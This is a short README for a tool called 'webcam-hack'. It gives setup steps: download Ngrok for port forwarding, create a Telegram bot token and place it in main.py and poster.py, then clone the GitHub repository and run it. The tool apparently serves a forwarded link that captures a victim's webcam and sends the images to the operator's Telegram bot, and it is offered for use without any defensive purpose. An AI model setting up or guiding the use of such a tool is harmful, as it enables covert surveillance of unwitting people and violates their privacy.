This project is written in Python, php and js (JavaScript).
And it uses the Ngrok tool for the forwarding port.
so you have to put the Ngrok tool next to these project files before you run the project.
- You need a Linux server to use this script
- You can download the Linux server for free from replit.com
curl https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip -o ngrok.zip
unzip ngrok.zip
- First create a robot through the @BotFather telegram robot and receive its token
- Then open the main.py file and place your token on line 12
- Open the poster.py file and place your token on line 9
git clone https://github.com/MrFploit/webcam-hack
cd webcam-hack
python3 main.py